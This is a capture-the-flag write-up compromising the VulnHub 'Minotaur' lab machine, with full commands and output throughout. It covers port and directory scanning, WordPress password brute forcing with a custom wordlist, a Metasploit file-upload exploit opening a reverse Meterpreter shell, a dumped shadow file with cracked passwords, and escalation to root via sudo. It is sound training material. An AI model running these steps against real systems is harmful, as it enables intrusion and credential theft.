Minotaur VulnHub Writeup

  1. Hints
  2. Initial discovery
  3. FTP
  4. Apache
  5. Wordpress
  6. Custom Wordlist
  7. Enter John
  8. Metasploit
  9. The return of John
  10. heffer
  11. minotaur
  12. Conclusion

This image is brought to us by Robert Winkel, and is named Minotaur.

Hints

Reading the description for this image, we find the following two hints.

  1. This CTF has a couple of fairly heavy password cracking challenges, and some red herrings.
  2. One password you will need is not on rockyou.txt or any other wordlist you may have out there. So you need to think of a way to generate it yourself.

Initial discovery

Ok, moving on. I had trouble finding the machine on my host only network, but after performing an nmap scan for port 80, I came across our target. I then ran a more thoughrough scan.

$ nmap -T4 -A -v -p0-65535 192.168.56.223

Starting Nmap 6.47 ( http://nmap.org ) at 2016-04-14 13:47 EDT
NSE: Loaded 118 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 13:47
Scanning 192.168.56.223 [1 port]
Completed ARP Ping Scan at 13:47, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:47
Completed Parallel DNS resolution of 1 host. at 13:47, 0.02s elapsed
Initiating SYN Stealth Scan at 13:47
Scanning 192.168.56.223 [65536 ports]
Discovered open port 22/tcp on 192.168.56.223
Discovered open port 80/tcp on 192.168.56.223
Discovered open port 2020/tcp on 192.168.56.223
Completed SYN Stealth Scan at 13:47, 5.45s elapsed (65536 total ports)
Initiating Service scan at 13:47
Scanning 3 services on 192.168.56.223
Completed Service scan at 13:47, 11.01s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.223
NSE: Script scanning 192.168.56.223.
Initiating NSE at 13:47
Completed NSE at 13:47, 0.17s elapsed
Nmap scan report for 192.168.56.223
Host is up (0.00036s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     (protocol 2.0)
| ssh-hostkey:
|   1024 ed:74:0c:c9:21:c4:58:47:d4:02:89:c7:e5:3e:09:18 (DSA)
|   2048 0c:4b:a8:24:7e:fc:cd:8a:b1:9f:87:dd:9d:06:30:05 (RSA)
|_  256 40:9b:fe:f9:82:41:17:93:a2:96:34:25:1c:53:bb:ae (ECDSA)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-methods: OPTIONS GET HEAD POST
|_http-title: Apache2 Ubuntu Default Page: It works
2020/tcp open  ftp     vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.47%I=7%D=4/14%Time=570FD7A2%P=i686-pc-linux-gnu%r(NULL,2
SF:9,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n");
MAC Address: 08:00:27:75:F8:9D (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.11 - 3.14
Uptime guess: 0.001 days (since Thu Apr 14 13:45:32 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=253 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: minotaur

TRACEROUTE
HOP RTT     ADDRESS
1   0.37 ms 192.168.56.223

NSE: Script Post-scanning.
Initiating NSE at 13:47
Completed NSE at 13:47, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.77 seconds
           Raw packets sent: 65559 (2.885MB) | Rcvd: 65554 (2.623MB)

So we've got an ssh server on port 22, an Apache server on port 80, and an ftp server on port 2020 with anonymous login enabled.

FTP

I login to the FTP server, however come up dry.

$ ftp
ftp> open 192.168.56.223 2020
Connected to 192.168.56.223.
220 Welcome to minotaur FTP service.
Name (192.168.56.223:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lah
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        114          4096 May 18  2015 .
drwxr-xr-x    2 0        114          4096 May 18  2015 ..

NEXT!

Apache

The root for the Apache server just returns the default page for an Ubuntu server. I shift to dirsearch to do some common name checking. I first run with the default wordlist, and then switch to an alternative wordlist.

$ python3 dirsearch.py -u192.168.56.223 -ephp -w /usr/share/dict/american-english

 _|. _ _  _  _  _ _|_    v0.3.6
(_||| _) (/_(_|| (_| )

Extensions: php | Threads: 10 | Wordlist size: 99171

Error Log: /root/dirsearch/logs/errors-16-04-14_13-49-38.log

Target: 192.168.56.223

[13:49:38] Starting:
[13:50:34] 301 -  314B  - /bull  ->  http://192.168.56.223/bull/

Great, we've got a single hit.

Wordpress

Visiting the URL, we are presented with a rather bullish blog. I fire up wpscan in order to enumerate as much as I can.

$ wpscan --url 192.168.56.223/bull/ -r --enumerate u --enumerate p --enumerate t --enumerate tt
_______________________________________________________________
       __          _______   _____                  
       \ \        / /  __ \ / ____|                 
        \ \  /\  / /| |__) | (___   ___  __ _ _ __  
         \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
          \  /\  /  | |     ____) | (__| (_| | | | |
           \/  \/   |_|    |_____/ \___|\__,_|_| |_|

       WordPress Security Scanner by the WPScan Team
                      Version 2.7
         Sponsored by Sucuri - https://sucuri.net
  @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.56.223/bull/
[+] Started: Thu Apr 14 13:52:50 2016

[!] The WordPress 'http://192.168.56.223/bull/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.6
[+] XML-RPC Interface available under: http://192.168.56.223/bull/xmlrpc.php
[i] This may allow the GHOST vulnerability to be exploited, please see: https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
[!] Upload directory has directory listing enabled: http://192.168.56.223/bull/wp-content/uploads/

[+] WordPress version 4.2.2 identified from meta generator
[!] 12 vulnerabilities identified from the version number

[!] Title: WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)
   Reference: https://wpvulndb.com/vulnerabilities/8111
   Reference: https://wordpress.org/news/2015/07/wordpress-4-2-3/
   Reference: https://twitter.com/klikkioy/status/624264122570526720
   Reference: https://klikki.fi/adv/wordpress3.html
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5622
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5623
[i] Fixed in: 4.2.3

[!] Title: WordPress <= 4.2.3 - wp_untrash_post_comments SQL Injection
   Reference: https://wpvulndb.com/vulnerabilities/8126
   Reference: https://github.com/WordPress/WordPress/commit/70128fe7605cb963a46815cf91b0a5934f70eff5
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2213
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Timing Side Channel Attack
   Reference: https://wpvulndb.com/vulnerabilities/8130
   Reference: https://core.trac.wordpress.org/changeset/33536
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5730
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Widgets Title Cross-Site Scripting (XSS)
   Reference: https://wpvulndb.com/vulnerabilities/8131
   Reference: https://core.trac.wordpress.org/changeset/33529
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5732
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Nav Menu Title Cross-Site Scripting (XSS)
   Reference: https://wpvulndb.com/vulnerabilities/8132
   Reference: https://core.trac.wordpress.org/changeset/33541
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5733
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Legacy Theme Preview Cross-Site Scripting (XSS)
   Reference: https://wpvulndb.com/vulnerabilities/8133
   Reference: https://core.trac.wordpress.org/changeset/33549
   Reference: https://blog.sucuri.net/2015/08/persistent-xss-vulnerability-in-wordpress-explained.html
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5734
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.3 - Authenticated Shortcode Tags Cross-Site Scripting (XSS)
   Reference: https://wpvulndb.com/vulnerabilities/8186
   Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
   Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
   Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5714
[i] Fixed in: 4.2.5

[!] Title: WordPress <= 4.3 - User List Table Cross-Site Scripting (XSS)
   Reference: https://wpvulndb.com/vulnerabilities/8187
   Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
   Reference: https://github.com/WordPress/WordPress/commit/f91a5fd10ea7245e5b41e288624819a37adf290a
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7989
[i] Fixed in: 4.2.5

[!] Title: WordPress <= 4.3 - Publish Post and Mark as Sticky Permission Issue
   Reference: https://wpvulndb.com/vulnerabilities/8188
   Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
   Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
   Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5715
[i] Fixed in: 4.2.5

[!] Title: WordPress  3.7-4.4 - Authenticated Cross-Site Scripting (XSS)
   Reference: https://wpvulndb.com/vulnerabilities/8358
   Reference: https://wordpress.org/news/2016/01/wordpress-4-4-1-security-and-maintenance-release/
   Reference: https://github.com/WordPress/WordPress/commit/7ab65139c6838910426567849c7abed723932b87
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1564
[i] Fixed in: 4.2.6

[!] Title: WordPress 3.7-4.4.1 - Local URIs Server Side Request Forgery (SSRF)
   Reference: https://wpvulndb.com/vulnerabilities/8376
   Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
   Reference: https://core.trac.wordpress.org/changeset/36435
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2222
[i] Fixed in: 4.2.7

[!] Title: WordPress 3.7-4.4.1 - Open Redirect
   Reference: https://wpvulndb.com/vulnerabilities/8377
   Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
   Reference: https://core.trac.wordpress.org/changeset/36444
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2221
[i] Fixed in: 4.2.7

[+] WordPress theme in use: twentyfourteen - v1.4

[+] Name: twentyfourteen - v1.4
|  Location: http://192.168.56.223/bull/wp-content/themes/twentyfourteen/
|  Style URL: http://192.168.56.223/bull/wp-content/themes/twentyfourteen/style.css
|  Theme Name: Twenty Fourteen
|  Theme URI: https://wordpress.org/themes/twentyfourteen/
|  Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern des...
|  Author: the WordPress team
|  Author URI: https://wordpress.org/

[+] Enumerating installed plugins  ...

  Time: 00:00:02 <====================================================================================================> (2012 / 2012) 100.00% Time: 00:00:02

[+] We found 2 plugins:

[+] Name: akismet - v3.1.1
|  Location: http://192.168.56.223/bull/wp-content/plugins/akismet/
|  Readme: http://192.168.56.223/bull/wp-content/plugins/akismet/readme.txt

[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
   Reference: https://wpvulndb.com/vulnerabilities/8215
   Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
   Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
[i] Fixed in: 3.1.5

[+] Name: slideshow-gallery - v1.4.6
|  Location: http://192.168.56.223/bull/wp-content/plugins/slideshow-gallery/
|  Readme: http://192.168.56.223/bull/wp-content/plugins/slideshow-gallery/readme.txt
[!] Directory listing is enabled: http://192.168.56.223/bull/wp-content/plugins/slideshow-gallery/

[!] Title: Slideshow Gallery < 1.4.7 Arbitrary File Upload
   Reference: https://wpvulndb.com/vulnerabilities/7532
   Reference: http://seclists.org/bugtraq/2014/Sep/1
   Reference: http://packetstormsecurity.com/files/131526/
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5460
   Reference: http://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload
   Reference: http://www.exploit-db.com/exploits/34681/
   Reference: http://www.exploit-db.com/exploits/34514/
[i] Fixed in: 1.4.7

[!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS)
   Reference: https://wpvulndb.com/vulnerabilities/8263
   Reference: http://cinu.pl/research/wp-plugins/mail_5954cbf04cd033877e5415a0c6fba532.html
   Reference: http://blog.cinu.pl/2015/11/php-static-code-analysis-vs-top-1000-wordpress-plugins.html
[i] Fixed in: 1.5.3.4

[+] Enumerating installed themes  ...

  Time: 00:00:00 <======================================================================================================> (768 / 768) 100.00% Time: 00:00:00

[+] We found 1 themes:

[+] Name: twentyfourteen - v1.4
|  Location: http://192.168.56.223/bull/wp-content/themes/twentyfourteen/
|  Style URL: http://192.168.56.223/bull/wp-content/themes/twentyfourteen/style.css
|  Theme Name: Twenty Fourteen
|  Theme URI: https://wordpress.org/themes/twentyfourteen/
|  Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern des...
|  Author: the WordPress team
|  Author URI: https://wordpress.org/

[+] Enumerating timthumb files ...

  Time: 00:00:02 <====================================================================================================> (2539 / 2539) 100.00% Time: 00:00:02

[+] No timthumb files found

[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
   +----+-------+-------+
   | Id | Login | Name  |
   +----+-------+-------+
   | 1  | bully | bully |
   +----+-------+-------+

[+] Finished: Thu Apr 14 13:53:09 2016
[+] Requests Done: 5484
[+] Memory used: 8.711 MB
[+] Elapsed time: 00:00:18

So we've got a couple of out-dated plugins, one with an authenticated file upload vulnerability. In order to take advantage of this, we need the password for the bully user.

After attempting a few common passwords, I take a stab in the dark that this would be the password we need to crack.

Custom Wordlist

The hint we read previously alludes to the requirement of generating our own wordlist.

I use the cewl tool to generate a wordlist from the website content, and run this against the installation with wpscan.

$ cewl -w words.txt http://192.168.56.223/bull/
CeWL 5.0 Robin Wood (robin@digininja.org) (www.digininja.org)

$ wpscan --username bully --url http://192.168.56.223/bull/ --wordlist words.txt --threads 10
...snip...
[+] Starting the password brute forcer
  Brute Forcing 'bully' Time: 00:00:09 <================================================================================= > (481 / 483) 99.58%  ETA: 00:00:00

  +----+-------+------+----------+
  | Id | Login | Name | Password |
  +----+-------+------+----------+
  |    | bully |      |          |
  +----+-------+------+----------+

[+] Finished: Thu Apr 14 13:59:21 2016
[+] Requests Done: 625
[+] Memory used: 2.805 MB
[+] Elapsed time: 00:00:10

Shucks - no hits. I search for any articles on generating custom word lists with cewl, and come across this great article by NetSec.

Enter John

Following the article above, we generate a wordlist with a minimum word length of 6, and then use John the Ripper to apply its great ruleset, resulting in a list of mutated passwords.

$ cewl -w words.txt -m 6 http://192.168.56.223/bull/
CeWL 5.0 Robin Wood (robin@digininja.org) (www.digininja.org)

$ john --wordlist=words.txt --rules --stdout > words-john.txt
words: 11258  time: 0:00:00:00 DONE (Thu Apr 14 14:06:33 2016)  w/s: 375266  current: Receiving

Next, I fire this off to wpscan again.

$ wpscan --username bully --url http://192.168.56.223/bull/ --wordlist words-john.txt --threads 10
[+] Starting the password brute forcer
 Brute Forcing 'bully' Time: 00:03:20 <======================================================================        > (10316 / 11259) 91.62%  ETA: 00:00:18
 [SUCCESS] Login : bully Password : Bighornedbulls


 +----+-------+------+----------------+
 | Id | Login | Name | Password       |
 +----+-------+------+----------------+
 |    | bully |      | Bighornedbulls |
 +----+-------+------+----------------+

[+] Finished: Thu Apr 14 14:10:11 2016
[+] Requests Done: 10461
[+] Memory used: 3.039 MB
[+] Elapsed time: 00:03:21

Awesome - we have a valid login!

Metasploit

We already know that there's a plugin with a file upload vulnerability present, with a plugin in metasploit, so let's use the tools we have at our disposal. I fire up metasploit, and using the previously discovered login trigger the exploit.

msf > use exploit/unix/webapp/wp_slideshowgallery_upload
msf exploit(wp_slideshowgallery_upload) > show options

Module options (exploit/unix/webapp/wp_slideshowgallery_upload):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                         yes       The target address
   RPORT        80               yes       The target port
   TARGETURI    /                yes       The base path to the wordpress application
   VHOST                         no        HTTP server virtual host
   WP_PASSWORD                   yes       Valid password for the provided username
   WP_USER                       yes       A valid username


Exploit target:

   Id  Name
   --  ----
   0   WP SlideShow Gallery 1.4.6


msf exploit(wp_slideshowgallery_upload) > set RHOST 192.168.56.223
RHOST => 192.168.56.223
msf exploit(wp_slideshowgallery_upload) > set TARGETURI /bull/
TARGETURI => /bull/
msf exploit(wp_slideshowgallery_upload) > set WP_USER bully
WP_USER => bully
msf exploit(wp_slideshowgallery_upload) > set WP_PASSWORD Bighornedbulls
WP_PASSWORD => Bighornedbulls
msf exploit(wp_slideshowgallery_upload) > run

[*] Started reverse handler on 192.168.56.103:4444
[*] 192.168.56.223:80 - Trying to login as bully
[*] 192.168.56.223:80 - Trying to upload payload
[*] 192.168.56.223:80 - Uploading payload
[*] 192.168.56.223:80 - Calling uploaded file ieqercms.php
[*] Sending stage (32461 bytes) to 192.168.56.223
[*] Meterpreter session 1 opened (192.168.56.103:4444 -> 192.168.56.223:57315) at 2016-04-14 14:11:55 -0400
[+] Deleted ieqercms.php

Next, I open up a shell and find our first flag.

meterpreter > shell
Process 3732 created.
Channel 1 created.
cd /var/www/html
ls -lah
total 28K
drwxr-xr-x 3 www-data www-data 4.0K May 27  2015 .
drwxr-xr-x 3 root     root     4.0K May 14  2015 ..
drwxr-xr-x 5 www-data www-data 4.0K May 14  2015 bull
-rw------- 1 www-data www-data   47 May 27  2015 flag.txt
-rw-r--r-- 1 www-data www-data  12K May 14  2015 index.html
cat flag.txt
Oh, lookey here. A flag!
Th15 15 @N 3@5y f1@G!

After a little digging, I find something a little interesting.

cd /tmp
ls -lah
total 16K
drwxrwxrwt  2 root root     4.0K Apr 15 05:39 .
drwxr-xr-x 21 root root     4.0K May 14  2015 ..
-rw-r-----  1 root www-data  121 May 27  2015 flag.txt
-rw-r-----  1 root www-data 1.2K May 27  2015 shadow.bak
cat flag.txt
That shadow.bak file is probably useful, hey?
Also, you found a flag!
My m1L|<$|-|@|<3 br1|\|G$ @11 t3h b0y$ 2 t3h y@R|)
cat shadow.bak
root:$6$15/OlfJP$h70tk3qikcf.kfwlGpYT7zfFg.cRzlJMlbVDSj3zCg4967ZXG0JzN/6oInrnvGf7AZaJFE2qJdBAOc/3AyeGX.:16569:0:99999:7:::
daemon:*:16484:0:99999:7:::
bin:*:16484:0:99999:7:::
sys:*:16484:0:99999:7:::
sync:*:16484:0:99999:7:::
games:*:16484:0:99999:7:::
man:*:16484:0:99999:7:::
lp:*:16484:0:99999:7:::
mail:*:16484:0:99999:7:::
news:*:16484:0:99999:7:::
uucp:*:16484:0:99999:7:::
proxy:*:16484:0:99999:7:::
www-data:*:16484:0:99999:7:::
backup:*:16484:0:99999:7:::
list:*:16484:0:99999:7:::
irc:*:16484:0:99999:7:::
gnats:*:16484:0:99999:7:::
nobody:*:16484:0:99999:7:::
libuuid:!:16484:0:99999:7:::
syslog:*:16484:0:99999:7:::
mysql:!:16569:0:99999:7:::
messagebus:*:16569:0:99999:7:::
landscape:*:16569:0:99999:7:::
sshd:*:16569:0:99999:7:::
minotaur:$6$3qaiXwrS$1Ctbj1UPpzKjWSgpIaUH0PovtO2Ar/IshWUe4tIUrJf8VlbIIijxdu4xHsXltA0mFavbo701X9.BG/fVIPD35.:16582:0:99999:7:::
ftp:*:16573:0:99999:7:::
heffer:$6$iH6pqgzM$3nJ00ToM38a.qLqcW8Yv0pdRiO/fXOvNv03rBzv./E0TO4B8y.QF/PNZ2JrghQTZomdVl3Zffb/MkWrFovWUi/:16582:0:99999:7:::
h0rnbag:$6$nlapGOqY$Hp5VHWq388mVQemkiJA2U1qLI.rZAFzxCw7ivfyglRNgZ6mx68sE1futUy..m7dYJRQRUWEpm3XKihXPB9Akd1:16582:0:99999:7:::

It looks like we're not finished with John yet..

The return of John

I retrieve the shadow.bak file and fire up John for another round.

./john --fork=8 shadow.bak
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Loaded 4 password hashes with 4 different salts (sha512crypt, crypt(3) $6$ [SHA512 64/64 OpenSSL])
Warning: OpenMP was disabled due to --fork; a non-OpenMP build may be faster
Node numbers 1-8 of 8 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
Password1        (heffer)
obiwan6          (minotaur)

We've now got what (we hope) are two more valid logins for the target.

heffer

Using my favourite Python snippet, we su to heffer and check out their home directory, as well as their sudo permissions.

python -c 'import pty; pty.spawn("/bin/bash");'
www-data@minotaur:/tmp$ su heffer
su heffer
Password: Password1

heffer@minotaur:/tmp$ cd /home/heffer
cd /home/heffer
heffer@minotaur:~$ ls -lah
ls -lah
total 28K
drwx------ 3 heffer heffer 4.0K May 27  2015 .
drwxr-xr-x 5 root   root   4.0K May 27  2015 ..
lrwxrwxrwx 1 heffer heffer    9 May 27  2015 .bash_history -> /dev/null
-rw-r--r-- 1 heffer heffer  220 May 27  2015 .bash_logout
-rw-r--r-- 1 heffer heffer 3.6K May 27  2015 .bashrc
drwx------ 2 heffer heffer 4.0K May 27  2015 .cache
-rw------- 1 heffer heffer  107 May 27  2015 flag.txt
-rw-r--r-- 1 heffer heffer  675 May 27  2015 .profile
heffer@minotaur:~$ cat flag.txt
cat flag.txt
So this was an easy flag to get, hopefully. Have you gotten ~minotaur/flag.txt yet?
Th3 fl@G 15: m00000 y0
sudo -l
Matching Defaults entries for heffer on minotaur:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User heffer may run the following commands on minotaur:
    (root) NOPASSWD: /root/bullquote.sh

Curious -we are able to sudo a script named /root/bullquote.sh. Let's give it a try.

heffer@minotaur:~$ sudo /root/bullquote.sh
sudo /root/bullquote.sh
[sudo] password for heffer: Password1

sudo: /root/bullquote.sh: command not found

Damn, ok..moving on.

minotaur

I repeat the process for minotaur.

www-data@minotaur:/tmp$ su minotaur
su minotaur
Password: obiwan6

minotaur@minotaur:/tmp$ cd /home/minotaur
cd /home/minotaur
minotaur@minotaur:~$ ls -alh
ls -alh
total 36K
drwx------ 4 minotaur minotaur 4.0K May 27  2015 .
drwxr-xr-x 5 root     root     4.0K May 27  2015 ..
lrwxrwxrwx 1 minotaur minotaur    9 May 27  2015 .bash_history -> /dev/null
-rw-r--r-- 1 minotaur minotaur  220 May 14  2015 .bash_logout
-rw-r--r-- 1 minotaur minotaur 3.6K May 14  2015 .bashrc
drwx------ 2 minotaur minotaur 4.0K May 14  2015 .cache
-rw------- 1 minotaur minotaur  107 May 27  2015 flag.txt
-rw-r--r-- 1 minotaur minotaur   22 May 27  2015 .gdbinit
drwxr-xr-x 4 minotaur minotaur 4.0K May 27  2015 peda
-rw-r--r-- 1 minotaur minotaur  675 May 14  2015 .profile
minotaur@minotaur:~$ cat flag.txt
cat flag.txt
Congrats! You've found the first flag:
M355 W17H T3H 8ULL, G37 73H H0RN!

But can you get /root/flag.txt ?
minotaur@minotaur:~$ sudo -l
sudo -l
Matching Defaults entries for minotaur on minotaur:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User minotaur may run the following commands on minotaur:
    (root) NOPASSWD: /root/bullquote.sh
    (ALL : ALL) ALL

What's this - we can sudo as any user, for any command? I'll take it!

minotaur@minotaur:~$ sudo su
sudo su
[sudo] password for minotaur: obiwan6

root@minotaur:/home/minotaur# cd /root
cd /root
root@minotaur:~# ls -lah
ls -lah
total 40K
drwx------  5 root root 4.0K May 27  2015 .
drwxr-xr-x 21 root root 4.0K May 14  2015 ..
lrwxrwxrwx  1 root root    9 May 27  2015 .bash_history -> /dev/null
-rw-r--r--  1 root root 3.1K Feb 20  2014 .bashrc
drwx------  2 root root 4.0K May 15  2015 .cache
-rw-------  1 root root   70 May 27  2015 flag.txt
-rw-------  1 root root   22 May 27  2015 .gdbinit
drwxr-xr-x  4 root root 4.0K May 27  2015 peda
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
-rwx------  1 root root  845 May 15  2015 quotes.txt
drwx------  2 root root 4.0K May 27  2015 .ssh
root@minotaur:~# cat flag.txt
cat flag.txt
Congrats! You got the final flag!
Th3 Fl@g is: 5urr0nd3d bY @r$3h0l35

Conclusion

Over all, I was surprised at the last step. We had gdb-peda installed, so every part of me expected this to include a binary challenge. All in all, a nice little challenge. I learnt a nice trick with regards to generating word lists from a pre-existing list, so that was great.

Thanks Robert Winkel for the image, and as always, thank you VulnHub for hosting it!